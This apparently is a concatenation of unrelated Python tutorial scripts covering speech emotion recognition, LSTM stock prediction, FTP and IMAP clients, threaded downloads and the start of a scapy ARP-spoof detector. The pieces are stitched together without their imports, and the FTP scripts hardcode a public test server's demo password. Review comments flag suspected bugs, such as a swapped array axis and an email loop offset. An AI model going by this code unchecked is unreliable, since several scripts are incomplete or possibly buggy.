def normalize(snd_data):
    """Scale all samples so the loudest one hits a fixed peak amplitude."""
    MAXIMUM = 16384
    # Scale factor that maps the current peak to MAXIMUM
    scale = float(MAXIMUM) / max(abs(sample) for sample in snd_data)
    return array('h', (int(sample * scale) for sample in snd_data))
def trim(snd_data):
    """Remove leading and trailing samples quieter than THRESHOLD."""
    def _strip_leading(samples):
        # Everything from the first above-threshold sample onwards
        for idx, sample in enumerate(samples):
            if abs(sample) > THRESHOLD:
                return samples[idx:]
        # All silent: nothing survives
        return array('h')
    # Strip the front, then flip and strip again to handle the back
    trimmed = _strip_leading(snd_data)
    trimmed.reverse()
    trimmed = _strip_leading(trimmed)
    trimmed.reverse()
    return trimmed
def add_silence(snd_data, seconds):
    """Pad snd_data with `seconds` (float) of zero samples on both ends."""
    pad = array('h', [0] * int(seconds * RATE))
    padded = array('h', pad)
    padded.extend(snd_data)
    padded.extend(pad)
    return padded
def record():
    """
    Record a word or words from the microphone and
    return the data as an array of signed shorts.
    Normalizes the audio, trims silence from the
    start and end, and pads with 0.5 seconds of
    blank sound to make sure VLC et al can play
    it without getting chopped off.
    """
    p = pyaudio.PyAudio()
    stream = p.open(format=FORMAT, channels=1, rate=RATE,
                    input=True, output=True,
                    frames_per_buffer=CHUNK_SIZE)
    # count of consecutive silent chunks seen after speech started
    num_silent = 0
    # becomes True once the first non-silent chunk is heard
    snd_started = False
    r = array('h')
    while 1:
        # little endian, signed short
        snd_data = array('h', stream.read(CHUNK_SIZE))
        if byteorder == 'big':
            snd_data.byteswap()
        r.extend(snd_data)
        silent = is_silent(snd_data)
        if silent and snd_started:
            num_silent += 1
        elif not silent and not snd_started:
            snd_started = True
        # stop once SILENCE consecutive-ish silent chunks follow the speech
        if snd_started and num_silent > SILENCE:
            break
    sample_width = p.get_sample_size(FORMAT)
    stream.stop_stream()
    stream.close()
    p.terminate()
    # clean up the raw capture: normalize volume, cut silence, pad the ends
    r = normalize(r)
    r = trim(r)
    r = add_silence(r, 0.5)
    return sample_width, r
def record_to_file(path):
    """Record from the microphone and write the capture to `path` as a wav file."""
    sample_width, samples = record()
    # pack the samples as little-endian signed shorts
    frames = pack('<%dh' % len(samples), *samples)
    wf = wave.open(path, 'wb')
    wf.setnchannels(1)
    wf.setsampwidth(sample_width)
    wf.setframerate(RATE)
    wf.writeframes(frames)
    wf.close()
if __name__ == "__main__":
    # load the saved model (after training)
    model = pickle.load(open("result/mlp_classifier.model", "rb"))
    print("Please talk")
    filename = "test.wav"
    # record the file (start talking)
    record_to_file(filename)
    # extract features and reshape it to a single-sample batch for the classifier
    features = extract_feature(filename, mfcc=True, chroma=True, mel=True).reshape(1, -1)
    # predict the emotion label for the recorded clip
    result = model.predict(features)[0]
    # show the result !
    print("result:", result)
import soundfile
import numpy as np
import librosa
import glob
import os
from sklearn.model_selection import train_test_split
# all emotions on RAVDESS dataset
int2emotion = {
"01": "neutral",
"02": "calm",
"03": "happy",
"04": "sad",
"05": "angry",
"06": "fearful",
"07": "disgust",
"08": "surprised"
}
# we allow only these emotions
AVAILABLE_EMOTIONS = {
"angry",
"sad",
"neutral",
"happy"
}
def extract_feature(file_name, **kwargs):
    """
    Extract feature from audio file `file_name`
    Features supported:
        - MFCC (mfcc)
        - Chroma (chroma)
        - MEL Spectrogram Frequency (mel)
        - Contrast (contrast)
        - Tonnetz (tonnetz)
    e.g:
    `features = extract_feature(path, mel=True, mfcc=True)`
    Returns a 1-D numpy array: the time-averaged values of every requested
    feature, concatenated in the order listed above.
    """
    mfcc = kwargs.get("mfcc")
    chroma = kwargs.get("chroma")
    mel = kwargs.get("mel")
    contrast = kwargs.get("contrast")
    tonnetz = kwargs.get("tonnetz")
    with soundfile.SoundFile(file_name) as sound_file:
        X = sound_file.read(dtype="float32")
        sample_rate = sound_file.samplerate
        # chroma and contrast both need the short-time Fourier transform
        if chroma or contrast:
            stft = np.abs(librosa.stft(X))
        result = np.array([])
        if mfcc:
            mfccs = np.mean(librosa.feature.mfcc(y=X, sr=sample_rate, n_mfcc=40).T, axis=0)
            result = np.hstack((result, mfccs))
        if chroma:
            chroma = np.mean(librosa.feature.chroma_stft(S=stft, sr=sample_rate).T, axis=0)
            result = np.hstack((result, chroma))
        if mel:
            # pass the signal via the `y=` keyword: librosa >= 0.10 removed
            # melspectrogram's positional audio argument, so the old
            # `melspectrogram(X, sr=...)` call raises a TypeError there
            mel = np.mean(librosa.feature.melspectrogram(y=X, sr=sample_rate).T, axis=0)
            result = np.hstack((result, mel))
        if contrast:
            contrast = np.mean(librosa.feature.spectral_contrast(S=stft, sr=sample_rate).T, axis=0)
            result = np.hstack((result, contrast))
        if tonnetz:
            tonnetz = np.mean(librosa.feature.tonnetz(y=librosa.effects.harmonic(X), sr=sample_rate).T, axis=0)
            result = np.hstack((result, tonnetz))
    return result
def load_data(test_size=0.2):
    """Load RAVDESS wav files, extract speech features, and return a
    train/test split (X_train, X_test, y_train, y_test)."""
    feature_rows, labels = [], []
    for path in glob.glob("data/Actor_*/*.wav"):
        # the emotion code is the third dash-separated field of the file name
        code = os.path.basename(path).split("-")[2]
        emotion = int2emotion[code]
        # skip emotions outside the allowed subset
        if emotion not in AVAILABLE_EMOTIONS:
            continue
        feature_rows.append(extract_feature(path, mfcc=True, chroma=True, mel=True))
        labels.append(emotion)
    # fixed random_state keeps the split reproducible across runs
    return train_test_split(np.array(feature_rows), labels, test_size=test_size, random_state=7)
import speech_recognition as sr
import sys
# how many seconds to record, taken from the first CLI argument
duration = int(sys.argv[1])
# initialize the recognizer
r = sr.Recognizer()
print("Please talk")
with sr.Microphone() as source:
    # read the audio data from the default microphone
    audio_data = r.record(source, duration=duration)
    print("Recognizing...")
    # convert speech to text using Google's free web API
    text = r.recognize_google(audio_data)
    print(text)
import speech_recognition as sr
import sys
# path of the audio file to transcribe, from the first CLI argument
filename = sys.argv[1]
# initialize the recognizer
r = sr.Recognizer()
# open the file
with sr.AudioFile(filename) as source:
    # listen for the data (load audio to memory)
    audio_data = r.record(source)
    # recognize (convert from speech to text) using Google's free web API
    text = r.recognize_google(audio_data)
    print(text)
import os
import time
from tensorflow.keras.layers import LSTM
# Window size or the sequence length
N_STEPS = 100
# Lookup step, 1 is the next day (90 = predict 90 trading days ahead)
LOOKUP_STEP = 90
# test ratio size, 0.2 is 20%
TEST_SIZE = 0.2
# features to use
FEATURE_COLUMNS = ["adjclose", "volume", "open", "high", "low"]
# date now (used to stamp the data file and model name)
date_now = time.strftime("%Y-%m-%d")
### model parameters
N_LAYERS = 3
# LSTM cell
CELL = LSTM
# 256 LSTM neurons
UNITS = 256
# 40% dropout
DROPOUT = 0.4
### training parameters
# mean squared error loss
LOSS = "mse"
OPTIMIZER = "rmsprop"
BATCH_SIZE = 64
EPOCHS = 300
# Apple stock market
ticker = "AAPL"
ticker_data_filename = os.path.join("data", f"{ticker}_{date_now}.csv")
# model name to save (encodes every hyperparameter so runs don't collide)
model_name = f"{date_now}_{ticker}-{LOSS}-{CELL.__name__}-seq-{N_STEPS}-step-{LOOKUP_STEP}-layers-{N_LAYERS}-units-{UNITS}"
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import LSTM, Dense, Dropout
from sklearn import preprocessing
from sklearn.model_selection import train_test_split
from yahoo_fin import stock_info as si
from collections import deque
import numpy as np
import pandas as pd
import random
def load_data(ticker, n_steps=50, scale=True, shuffle=True, lookup_step=1,
                test_size=0.2, feature_columns=['adjclose', 'volume', 'open', 'high', 'low']):
    """
    Loads data from Yahoo Finance source, as well as scaling, shuffling, normalizing and splitting.
    Params:
        ticker (str/pd.DataFrame): the ticker you want to load, examples include AAPL, TESL, etc.
        n_steps (int): the historical sequence length (i.e window size) used to predict, default is 50
        scale (bool): whether to scale prices from 0 to 1, default is True
        shuffle (bool): whether to shuffle the data, default is True
        lookup_step (int): the future lookup step to predict, default is 1 (e.g next day)
        test_size (float): ratio for test data, default is 0.2 (20% testing data)
        feature_columns (list): the list of features to use to feed into the model, default is everything grabbed from yahoo_fin
    Returns a dict with keys: df, column_scaler (if scale), last_sequence,
    X_train, X_test, y_train, y_test.
    """
    # see if ticker is already a loaded stock from yahoo finance
    if isinstance(ticker, str):
        # load it from yahoo_fin library
        df = si.get_data(ticker)
    elif isinstance(ticker, pd.DataFrame):
        # already loaded, use it directly
        df = ticker
    else:
        raise TypeError("ticker can be either a str or a pd.DataFrame instances")
    # this will contain all the elements we want to return from this function
    result = {}
    # we will also return the original dataframe itself
    result['df'] = df.copy()
    # make sure that the passed feature_columns exist in the dataframe
    for col in feature_columns:
        assert col in df.columns
    if scale:
        column_scaler = {}
        # scale the data (prices) from 0 to 1, one independent scaler per column
        for column in feature_columns:
            scaler = preprocessing.MinMaxScaler()
            df[column] = scaler.fit_transform(np.expand_dims(df[column].values, axis=1))
            column_scaler[column] = scaler
        # add the MinMaxScaler instances to the result returned
        result["column_scaler"] = column_scaler
    # add the target column (label) by shifting by lookup_step
    df['future'] = df['adjclose'].shift(-lookup_step)
    # last lookup_step columns contains NaN in future column
    # get them before droping NaNs
    last_sequence = np.array(df[feature_columns].tail(lookup_step))
    # drop NaNs
    df.dropna(inplace=True)
    sequence_data = []
    # deque keeps only the most recent n_steps rows as we slide over the data
    sequences = deque(maxlen=n_steps)
    for entry, target in zip(df[feature_columns].values, df['future'].values):
        sequences.append(entry)
        if len(sequences) == n_steps:
            sequence_data.append([np.array(sequences), target])
    # get the last sequence by appending the last n_step sequence with lookup_step sequence
    # for instance, if n_steps=50 and lookup_step=10, last_sequence should be of 59 (that is 50+10-1) length
    # this last_sequence will be used to predict in future dates that are not available in the dataset
    last_sequence = list(sequences) + list(last_sequence)
    # shift the last sequence by -1
    last_sequence = np.array(pd.DataFrame(last_sequence).shift(-1).dropna())
    # add to result
    result['last_sequence'] = last_sequence
    # construct the X's and y's
    X, y = [], []
    for seq, target in sequence_data:
        X.append(seq)
        y.append(target)
    # convert to numpy arrays
    X = np.array(X)
    y = np.array(y)
    # reshape X to fit the neural network
    # NOTE(review): this swaps the time and feature axes, producing
    # (samples, n_features, n_steps); confirm it matches the model's
    # input_shape=(None, N_STEPS) convention used by create_model
    X = X.reshape((X.shape[0], X.shape[2], X.shape[1]))
    # split the dataset
    result["X_train"], result["X_test"], result["y_train"], result["y_test"] = train_test_split(X, y,
                                                                                test_size=test_size, shuffle=shuffle)
    # return the result
    return result
def create_model(input_length, units=256, cell=LSTM, n_layers=2, dropout=0.3,
                 loss="mean_absolute_error", optimizer="rmsprop"):
    """Build and compile a stacked recurrent regression model.

    The first recurrent layer declares the input shape, every layer except the
    last returns full sequences, each layer is followed by dropout, and a
    single linear unit produces the predicted price.
    """
    model = Sequential()
    for layer_idx in range(n_layers):
        is_first = layer_idx == 0
        is_last = layer_idx == n_layers - 1
        if is_first:
            # first layer carries the input shape and feeds sequences onward
            model.add(cell(units, return_sequences=True, input_shape=(None, input_length)))
        else:
            # intermediate layers keep sequences; the final one collapses them
            model.add(cell(units, return_sequences=not is_last))
        # regularize every recurrent layer
        model.add(Dropout(dropout))
    model.add(Dense(1, activation="linear"))
    model.compile(loss=loss, metrics=["mean_absolute_error"], optimizer=optimizer)
    return model
from stock_prediction import create_model, load_data, np
from parameters import *
import matplotlib.pyplot as plt
from sklearn.metrics import accuracy_score
def plot_graph(model, data):
    """Plot actual (blue) vs predicted (red) inverse-scaled adjclose prices
    for the last 200 test samples."""
    scaler = data["column_scaler"]["adjclose"]
    # undo the 0-1 MinMax scaling so the plot shows real prices
    actual = np.squeeze(scaler.inverse_transform(np.expand_dims(data["y_test"], axis=0)))
    predicted = np.squeeze(scaler.inverse_transform(model.predict(data["X_test"])))
    plt.plot(actual[-200:], c='b')
    plt.plot(predicted[-200:], c='r')
    plt.xlabel("Days")
    plt.ylabel("Price")
    plt.legend(["Actual Price", "Predicted Price"])
    plt.show()
def get_accuracy(model, data):
    """Score the model's direction calls: fraction of test days where the
    predicted up/down move LOOKUP_STEP days ahead matches the actual move."""
    scaler = data["column_scaler"]["adjclose"]
    actual = np.squeeze(scaler.inverse_transform(np.expand_dims(data["y_test"], axis=0)))
    predicted = np.squeeze(scaler.inverse_transform(model.predict(data["X_test"])))
    # 1 when the price LOOKUP_STEP days later is higher than today's
    pred_dir = [int(float(future) > float(current))
                for current, future in zip(actual[:-LOOKUP_STEP], predicted[LOOKUP_STEP:])]
    true_dir = [int(float(future) > float(current))
                for current, future in zip(actual[:-LOOKUP_STEP], actual[LOOKUP_STEP:])]
    return accuracy_score(true_dir, pred_dir)
def predict(model, data, classification=False):
    """Predict the future adjclose price from the most recent N_STEPS window.
    Returns the price on the original (inverse-scaled) scale."""
    # most recent window kept by load_data for out-of-sample prediction
    window = data["last_sequence"][:N_STEPS]
    # match the (features, time) layout the network was trained on
    window = window.reshape((window.shape[1], window.shape[0]))
    # single-sample batch dimension
    window = np.expand_dims(window, axis=0)
    # model output is on the 0-1 MinMax scale
    scaled = model.predict(window)
    # invert the scaling to get a real price
    return data["column_scaler"]["adjclose"].inverse_transform(scaled)[0][0]
# load the data (shuffle=False keeps the test set chronologically last)
data = load_data(ticker, N_STEPS, lookup_step=LOOKUP_STEP, test_size=TEST_SIZE,
                feature_columns=FEATURE_COLUMNS, shuffle=False)
# construct the model
model = create_model(N_STEPS, loss=LOSS, units=UNITS, cell=CELL, n_layers=N_LAYERS,
                    dropout=DROPOUT, optimizer=OPTIMIZER)
# restore the weights saved by the training script
model_path = os.path.join("results", model_name) + ".h5"
model.load_weights(model_path)
# evaluate the model
mse, mae = model.evaluate(data["X_test"], data["y_test"])
# calculate the mean absolute error (inverse scaling)
# NOTE(review): .reshape on `mae` only works if evaluate() returns a numpy
# scalar; a plain Python float would raise AttributeError — verify with the
# installed Keras version
mean_absolute_error = data["column_scaler"]["adjclose"].inverse_transform(mae.reshape(1, -1))[0][0]
print("Mean Absolute Error:", mean_absolute_error)
# predict the future price
future_price = predict(model, data)
print(f"Future price after {LOOKUP_STEP} days is {future_price:.2f}")
print("Accuracy Score:", get_accuracy(model, data))
plot_graph(model, data)
from stock_prediction import create_model, load_data
from tensorflow.keras.layers import LSTM
from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard
import os
import pandas as pd
from parameters import *
# --- training script: prepare folders, load data, fit, and save weights ---
# create these folders if they do not exist
if not os.path.isdir("results"):
    os.mkdir("results")
if not os.path.isdir("logs"):
    os.mkdir("logs")
if not os.path.isdir("data"):
    os.mkdir("data")
# load the data
data = load_data(ticker, N_STEPS, lookup_step=LOOKUP_STEP, test_size=TEST_SIZE, feature_columns=FEATURE_COLUMNS)
# construct the model
model = create_model(N_STEPS, loss=LOSS, units=UNITS, cell=CELL, n_layers=N_LAYERS,
                     dropout=DROPOUT, optimizer=OPTIMIZER)
# some tensorflow callbacks:
# checkpoint only the best weights (lowest validation loss) seen so far
checkpointer = ModelCheckpoint(os.path.join("results", model_name), save_weights_only=True, save_best_only=True, verbose=1)
tensorboard = TensorBoard(log_dir=os.path.join("logs", model_name))
history = model.fit(data["X_train"], data["y_train"],
                    batch_size=BATCH_SIZE,
                    epochs=EPOCHS,
                    validation_data=(data["X_test"], data["y_test"]),
                    callbacks=[checkpointer, tensorboard],
                    verbose=1)
# save the final (last-epoch) weights alongside the checkpointed best ones
model.save(os.path.join("results", model_name) + ".h5")
import ftplib

# --- download one file from the public dlptest.com FTP test server ---
FTP_HOST = "ftp.dlptest.com"
# NOTE(review): the original user string was "dlpuserdlptest.com", which lost
# its '@' during extraction; the dlptest.com demo account is documented as
# "dlpuser@dlptest.com" — confirm before use.
FTP_USER = "dlpuser@dlptest.com"
FTP_PASS = "SzMf7rTE4pCrf9dV286GuNe4N"
# connect to the FTP server
ftp = ftplib.FTP(FTP_HOST, FTP_USER, FTP_PASS)
# force UTF-8 encoding
ftp.encoding = "utf-8"
# the name of the file you want to download from the FTP server
filename = "some_file.txt"
with open(filename, "wb") as file:
    # use FTP's RETR command to download the file, streaming chunks to disk
    # (fixed: the command string previously interpolated a literal placeholder
    # instead of the filename)
    ftp.retrbinary(f"RETR {filename}", file.write)
# quit and close the connection
ftp.quit()
import ftplib

# --- upload one local file to the public dlptest.com FTP test server ---
FTP_HOST = "ftp.dlptest.com"
# NOTE(review): user string lost its '@' during extraction; the dlptest.com
# demo account is documented as "dlpuser@dlptest.com" — confirm before use.
FTP_USER = "dlpuser@dlptest.com"
FTP_PASS = "SzMf7rTE4pCrf9dV286GuNe4N"
# connect to the FTP server
ftp = ftplib.FTP(FTP_HOST, FTP_USER, FTP_PASS)
# force UTF-8 encoding
ftp.encoding = "utf-8"
# local file name you want to upload
filename = "some_file.txt"
with open(filename, "rb") as file:
    # use FTP's STOR command to upload the file
    # (fixed: the command string previously interpolated a literal placeholder
    # instead of the filename)
    ftp.storbinary(f"STOR {filename}", file)
# list current files & directories to confirm the upload
ftp.dir()
# quit and close the connection
ftp.quit()
# --- demo: the random module vs. the crypto-safe os.urandom/secrets APIs ---
import random
import os
import string
import secrets
# generate random integer between a and b (including a and b)
randint = random.randint(1, 500)
print("randint:", randint)
# generate random integer from range (step of 5, upper bound exclusive)
randrange = random.randrange(0, 500, 5)
print("randrange:", randrange)
# get a random element from this list
choice = random.choice(["hello", "hi", "welcome", "bye", "see you"])
print("choice:", choice)
# get 5 random elements from 0 to 1000 (with replacement — duplicates possible)
choices = random.choices(range(1000), k=5)
print("choices:", choices)
# generate a random floating point number from 0.0 <= x <= 1.0
randfloat = random.random()
print("randfloat between 0.0 and 1.0:", randfloat)
# generate a random floating point number such that a <= x <= b
randfloat = random.uniform(5, 10)
print("randfloat between 5.0 and 10.0:", randfloat)
l = list(range(10))
print("Before shuffle:", l)
# in-place shuffle
random.shuffle(l)
print("After shuffle:", l)
# generate a random string (sample draws without replacement, so no repeats)
randstring = ''.join(random.sample(string.ascii_letters, 16))
print("Random string with 16 characters:", randstring)
# crypto-safe byte generation (random module is NOT suitable for security)
randbytes_crypto = os.urandom(16)
print("Random bytes for crypto use using os:", randbytes_crypto)
# or use this
randbytes_crypto = secrets.token_bytes(16)
print("Random bytes for crypto use using secrets:", randbytes_crypto)
# crypto-secure URL-safe string generation (16 random bytes, base64-encoded)
randstring_crypto = secrets.token_urlsafe(16)
print("Random strings for crypto use:", randstring_crypto)
# crypto-secure bits generation
randbits_crypto = secrets.randbits(16)
print("Random 16-bits for crypto use:", randbits_crypto)
# --- demo: file/directory manipulation with the os module ---
import os
# print the current directory
print("The current directory:", os.getcwd())
# make an empty directory (folder)
os.mkdir("folder")
# running mkdir again with the same name raises FileExistsError, run this instead:
# if not os.path.isdir("folder"):
#     os.mkdir("folder")
# changing the current directory to 'folder'
os.chdir("folder")
# printing the current directory now
print("The current directory changing the directory to folder:", os.getcwd())
# go back a directory
os.chdir("..")
# make several nested directories in one call
os.makedirs("nested1/nested2/nested3")
# create a new text file
# NOTE(review): this handle is never closed before the rename below — the
# write may not be flushed to disk on all platforms.
text_file = open("text.txt", "w")
# write to this file some text
text_file.write("This is a text file")
# rename text.txt to renamed-text.txt
os.rename("text.txt", "renamed-text.txt")
# replace (move) this file to another directory
os.replace("renamed-text.txt", "folder/renamed-text.txt")
# print all files and folders in the current directory
print("All folders & files:", os.listdir())
# print all files & folders recursively
for dirpath, dirnames, filenames in os.walk("."):
    # iterate over directories
    for dirname in dirnames:
        print("Directory:", os.path.join(dirpath, dirname))
    # iterate over files
    for filename in filenames:
        print("File:", os.path.join(dirpath, filename))
# delete that file
os.remove("folder/renamed-text.txt")
# remove the folder (must be empty)
os.rmdir("folder")
# remove nested folders (removes each level that becomes empty)
os.removedirs("nested1/nested2/nested3")
open("text.txt", "w").write("This is a text file")
# print some stats about the file (mode, size, timestamps, ...)
print(os.stat("text.txt"))
# get the file size for example
print("File size:", os.stat("text.txt").st_size)
import ftplib
import os
from datetime import datetime
FTP_HOST = "ftp.ed.ac.uk"
FTP_USER = "anonymous"
FTP_PASS = ""
# some utility functions that we gonna need
def get_size_format(n, suffix="B"):
    """Convert a byte count into a human-readable string (e.g. ``1.50KB``).

    Args:
        n: size in bytes (int or float, assumed non-negative).
        suffix: unit suffix appended after the scale prefix, default "B".

    Returns:
        The size formatted with two decimal places and a binary-scale prefix.
    """
    for unit in ["", "K", "M", "G", "T", "P"]:
        if n < 1024:
            return f"{n:.2f}{unit}{suffix}"
        n /= 1024
    # fixed: the original fell off the loop and returned None for
    # sizes >= 1024 PB; report exabytes instead
    return f"{n:.2f}E{suffix}"
def get_datetime_format(date_time):
    """Re-format an FTP MLSD timestamp (``YYYYMMDDHHMMSS``) as a
    human-readable ``YYYY/MM/DD HH:MM:SS`` string."""
    # parse and re-format in one pass
    return datetime.strptime(date_time, "%Y%m%d%H%M%S").strftime("%Y/%m/%d %H:%M:%S")
# --- demo: three ways to list an FTP directory (LIST, NLST, MLSD) ---
# initialize FTP session
ftp = ftplib.FTP(FTP_HOST, FTP_USER, FTP_PASS)
# force UTF-8 encoding
ftp.encoding = "utf-8"
# print the welcome message
print(ftp.getwelcome())
# change the current working directory to 'pub' folder and 'maps' subfolder
ftp.cwd("pub/maps")
# LIST a directory
print("*"*50, "LIST", "*"*50)
ftp.dir()
# NLST command: names only; probe each entry to tell files from directories
print("*"*50, "NLST", "*"*50)
print("{:20} {}".format("File Name", "File Size"))
for file_name in ftp.nlst():
    file_size = "N/A"
    try:
        # cwd succeeds => it's a directory
        # NOTE(review): on success this leaves the session inside that
        # directory and never cwd's back, so subsequent probes are relative
        # to the wrong place — confirm intent.
        ftp.cwd(file_name)
    except Exception as e:
        # cwd failed => treat it as a file; switch to binary so SIZE works
        ftp.voidcmd("TYPE I")
        file_size = get_size_format(ftp.size(file_name))
    print(f"{file_name:20} {file_size}")
print("*"*50, "MLSD", "*"*50)
# using the MLSD command: structured (name, facts-dict) pairs
print("{:30} {:19} {:6} {:5} {:4} {:4} {:4} {}".format("File Name", "Last Modified", "Size",
                                                       "Perm","Type", "GRP", "MODE", "OWNER"))
for file_data in ftp.mlsd():
    # extract returning data
    file_name, meta = file_data
    # i.e directory, file or link, etc
    file_type = meta.get("type")
    if file_type == "file":
        # if it is a file, change type of transfer data to IMAGE/binary
        ftp.voidcmd("TYPE I")
        # get the file size in bytes
        file_size = ftp.size(file_name)
        # convert it to human readable format (i.e in 'KB', 'MB', etc)
        file_size = get_size_format(file_size)
    else:
        # not a file, may be a directory or other types
        file_size = "N/A"
    # date of last modification of the file
    last_modified = get_datetime_format(meta.get("modify"))
    # file permissions
    permission = meta.get("perm")
    # get the file unique id
    unique_id = meta.get("unique")
    # user group
    unix_group = meta.get("unix.group")
    # file mode, unix permissions
    unix_mode = meta.get("unix.mode")
    # owner of the file
    unix_owner = meta.get("unix.owner")
    # print all
    # NOTE(review): any missing fact (meta.get -> None) makes the width
    # format specs below raise TypeError — confirm the server always sends
    # these facts.
    print(f"{file_name:30} {last_modified:19} {file_size:7} {permission:5} {file_type:4} {unix_group:4} {unix_mode:4} {unix_owner}")
# quit and close the connection
ftp.quit()
import imaplib
import email
from email.header import decode_header
import webbrowser
import os
# --- read recent emails over IMAP, printing bodies and saving attachments ---
# account credentials
# NOTE(review): both placeholders look garbled by extraction (missing '@',
# e.g. "youremailaddress@provider.com") — replace with real credentials.
username = "youremailaddressprovider.com"
password = "yourpassword"
# number of top emails to fetch
N = 3
# create an IMAP4 class with SSL, use your email provider's IMAP server
imap = imaplib.IMAP4_SSL("imap.gmail.com")
# authenticate
imap.login(username, password)
# select a mailbox (in this case, the inbox mailbox)
# use imap.list() to get the list of mailboxes
status, messages = imap.select("INBOX")
# total number of emails
messages = int(messages[0])
# iterate newest-first
# NOTE(review): the -4 offsets skip the four most recent messages — the
# common form of this loop is range(messages, messages-N, -1); confirm the
# offset is intentional.
for i in range(messages-4, messages-N-4, -1):
    # fetch the email message by ID
    res, msg = imap.fetch(str(i), "(RFC822)")
    for response in msg:
        if isinstance(response, tuple):
            # parse a bytes email into a message object
            msg = email.message_from_bytes(response[1])
            # decode the email subject
            subject = decode_header(msg["Subject"])[0][0]
            if isinstance(subject, bytes):
                # if it's a bytes, decode to str
                subject = subject.decode()
            # email sender
            from_ = msg.get("From")
            print("Subject:", subject)
            print("From:", from_)
            # if the email message is multipart
            if msg.is_multipart():
                # iterate over email parts
                for part in msg.walk():
                    # extract content type of email
                    content_type = part.get_content_type()
                    content_disposition = str(part.get("Content-Disposition"))
                    try:
                        # get the email body
                        body = part.get_payload(decode=True).decode()
                    except:
                        # non-text part (e.g. the multipart container itself)
                        pass
                    if content_type == "text/plain" and "attachment" not in content_disposition:
                        # print text/plain emails and skip attachments
                        print(body)
                    elif "attachment" in content_disposition:
                        # download attachment
                        filename = part.get_filename()
                        if filename:
                            if not os.path.isdir(subject):
                                # make a folder for this email (named after the subject)
                                os.mkdir(subject)
                            filepath = os.path.join(subject, filename)
                            # download attachment and save it
                            open(filepath, "wb").write(part.get_payload(decode=True))
            else:
                # non-multipart: extract content type of email
                content_type = msg.get_content_type()
                # get the email body
                body = msg.get_payload(decode=True).decode()
                if content_type == "text/plain":
                    # print only text email parts
                    print(body)
            if content_type == "text/html":
                # if it's HTML, create a new HTML file and open it in browser
                if not os.path.isdir(subject):
                    # make a folder for this email (named after the subject)
                    os.mkdir(subject)
                filename = f"{subject[:50]}.html"
                filepath = os.path.join(subject, filename)
                # write the file
                open(filepath, "w").write(body)
                # open in the default browser
                webbrowser.open(filepath)
            print("="*100)
# close the connection and logout
imap.close()
imap.logout()
import requests
from concurrent.futures import ThreadPoolExecutor
from time import perf_counter
# number of threads to spawn
n_threads = 5
# read 1024 bytes every time
buffer_size = 1024
def download(url):
    """Stream *url* to a local file named after its last path segment.

    Reads the response in buffer_size chunks so large files never have to
    fit in memory.
    """
    # stream=True defers the body so we can consume it chunk by chunk
    response = requests.get(url, stream=True)
    filename = url.rsplit("/", 1)[-1]
    with open(filename, "wb") as out:
        for chunk in response.iter_content(buffer_size):
            out.write(chunk)
if __name__ == "__main__":
    # 25 download jobs (5 unique URLs repeated 5 times) fanned out over the pool
    urls = [
        "https://cdn.pixabay.com/photo/2018/01/14/23/12/nature-3082832__340.jpg",
        "https://cdn.pixabay.com/photo/2013/10/02/23/03/dawn-190055__340.jpg",
        "https://cdn.pixabay.com/photo/2016/10/21/14/50/plouzane-1758197__340.jpg",
        "https://cdn.pixabay.com/photo/2016/11/29/05/45/astronomy-1867616__340.jpg",
        "https://cdn.pixabay.com/photo/2014/07/28/20/39/landscape-404072__340.jpg",
    ] * 5
    t = perf_counter()
    # the with-block joins all workers before the timing line runs
    with ThreadPoolExecutor(max_workers=n_threads) as pool:
        pool.map(download, urls)
    print(f"Time took: {perf_counter() - t:.2f}s")
import requests
from threading import Thread
from queue import Queue
# thread-safe queue initialization
q = Queue()
# number of threads to spawn
n_threads = 5
# read 1024 bytes every time
buffer_size = 1024
def download():
    """Worker loop: repeatedly pull a URL from the shared queue and save it
    to a local file named after its last path segment.

    Runs forever; intended to be started as a daemon thread so it dies with
    the main thread once q.join() returns.
    """
    global q
    while True:
        # get the url from the queue (blocks until an item is available)
        url = q.get()
        # download the body of response by chunk, not immediately
        response = requests.get(url, stream=True)
        # get the file name
        filename = url.split("/")[-1]
        with open(filename, "wb") as f:
            for data in response.iter_content(buffer_size):
                # write data read to the file
                f.write(data)
        # we're done downloading the file — lets q.join() account for it
        q.task_done()
if __name__ == "__main__":
    # 25 download jobs (5 unique URLs repeated 5 times)
    urls = [
        "https://cdn.pixabay.com/photo/2018/01/14/23/12/nature-3082832__340.jpg",
        "https://cdn.pixabay.com/photo/2013/10/02/23/03/dawn-190055__340.jpg",
        "https://cdn.pixabay.com/photo/2016/10/21/14/50/plouzane-1758197__340.jpg",
        "https://cdn.pixabay.com/photo/2016/11/29/05/45/astronomy-1867616__340.jpg",
        "https://cdn.pixabay.com/photo/2014/07/28/20/39/landscape-404072__340.jpg",
    ] * 5
    # fill the queue with all the urls
    for url in urls:
        q.put(url)
    # start the threads
    for t in range(n_threads):
        worker = Thread(target=download)
        # daemon thread means a thread that will end when the main thread ends
        worker.daemon = True
        worker.start()
    # wait until the queue is empty (every item marked task_done)
    q.join()
import requests
from time import perf_counter
# read 1024 bytes every time
buffer_size = 1024
def download(url):
    """Fetch *url* and write it to a file named after the URL's basename,
    reading the body in buffer_size chunks."""
    # derive the local filename from everything after the final slash
    filename = url[url.rfind("/") + 1:]
    # stream the response instead of loading it whole
    response = requests.get(url, stream=True)
    f = open(filename, "wb")
    try:
        for piece in response.iter_content(buffer_size):
            f.write(piece)
    finally:
        f.close()
if __name__ == "__main__":
    # sequential baseline: same 25 jobs as the threaded variants, one at a time
    urls = [
        "https://cdn.pixabay.com/photo/2018/01/14/23/12/nature-3082832__340.jpg",
        "https://cdn.pixabay.com/photo/2013/10/02/23/03/dawn-190055__340.jpg",
        "https://cdn.pixabay.com/photo/2016/10/21/14/50/plouzane-1758197__340.jpg",
        "https://cdn.pixabay.com/photo/2016/11/29/05/45/astronomy-1867616__340.jpg",
        "https://cdn.pixabay.com/photo/2014/07/28/20/39/landscape-404072__340.jpg",
    ] * 5
    t = perf_counter()
    for url in urls:
        download(url)
    print(f"Time took: {perf_counter() - t:.2f}s")
from scapy.all import Ether, ARP, srp, sniff, conf
def get_mac(ip):
    """
    Returns the MAC address of ip, if it is unable to find it
    for some reason, throws IndexError
    """
    # broadcast an ARP who-has for ip
    p = Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip)
    # srp returns (answered, unanswered); take the answered list
    result = srp(p, timeout=3, verbose=False)[0]
    # first answered pair is (sent, received); hwsrc of the reply is the MAC
    return result[0][1].hwsrc
def process(packet):
    """Sniffer callback: flag ARP replies whose claimed MAC does not match
